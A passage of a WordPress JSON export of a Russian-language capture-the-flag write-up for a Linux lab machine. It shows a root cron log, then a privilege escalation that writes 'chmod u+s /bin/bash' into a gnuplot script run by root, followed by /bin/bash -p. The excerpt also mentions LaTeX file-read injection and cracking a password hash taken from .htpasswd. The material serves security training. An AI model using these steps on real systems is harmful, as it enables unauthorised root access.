\/usr\/sbin\/CRON -f\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3565    |    \/usr\/sbin\/CRON -f\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3579    |    sed s\/,\/\/g\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3578    |    \/bin\/sh \/opt\/gnuplot\/getdata.sh\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3577    |    \/bin\/sh \/opt\/gnuplot\/getdata.sh\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3576    |    uptime\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3580    |    \/bin\/sh \/opt\/gnuplot\/getdata.sh\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3581    |    tail -60 \/opt\/gnuplot\/loaddata.dat\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3582    |   gnuplot \/opt\/gnuplot\/networkplot.plt\n<\/pre><\/div>\n\n\n<p>\u041f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u043a\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 <code>gnuplot<\/code> \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 <code>root<\/code>. \u0421\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u0444\u0430\u0439\u043b <code>evil.plt<\/code> \u0432 <code>\/opt\/gnuplot<\/code> \u0441 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u044b\u043c:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\necho &quot;system 'chmod u+s \/bin\/bash'&quot; &amp;gt; \/opt\/gnuplot\/evil.plt\n<\/pre><\/div>\n\n\n<p>\u0427\u0435\u0440\u0435\u0437 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u0443: <code>\/bin\/bash -p<\/code><\/p>\n\n\n\n<p>\u0423\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 <code>root<\/code> \u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0444\u043b\u0430\u0433:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-42.png\" alt=\"\" class=\"wp-image-854\" width=\"700\" \/><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u0421\u0441\u044b\u043b\u043a\u0438:<\/h3>\n\n\n\n<p><a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/formula-csv-doc-latex-ghostscript-injection#read-file\">https:\/\/book.hacktricks.xyz\/pentesting-web\/formula-csv-doc-latex-ghostscript-injection#read-file<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/LaTeX%20Injection\">https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/LaTeX%20Injection<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/exploit-notes.hdks.org\/exploit\/linux\/privilege-escalation\/gnuplot-privilege-escalation\/\">https:\/\/exploit-notes.hdks.org\/exploit\/linux\/privilege-escalation\/gnuplot-privilege-escalation\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c: Easy \u041e\u0421: Linux \u0411\u0430\u043b\u043b\u044b: 20 IP: 10.10.11.217 \u0422\u0435\u0433\u0438: LaTeX syntax, Password Bruteforce, Command Injection, Linux PrivEsc \u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0447\u0442\u0435\u043d\u0438\u044f \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440\u0430 LaTeX.\u0418\u0437 \u0444\u0430\u0439\u043b\u0430 \/var\/www\/dev\/.htpasswd \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c Apache MD5 \u0445\u044d\u0448 \u043f\u0430\u0440\u043e\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 vdaisley \u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0435\u043c \u0435\u0433\u043e, \u043f\u043e\u0441\u043b\u0435 [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-840","post","type-post","status-publish","format-standard","hentry","category-blog"],"translation":{"provider":"WPGlobus","version":"3.0.0","language":"en","enabled_languages":["ru","en"],"languages":{"ru":{"title":true,"content":true,"excerpt":false},"en":{"title":false,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/840","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/comments?post=840"}],"version-history":[{"count":20,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/840\/revisions"}],"predecessor-version":[{"id":874,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/840\/revisions\/874"}],"wp:attachment":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/media?parent=840"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/categories?post=840"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/tags?post=840"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}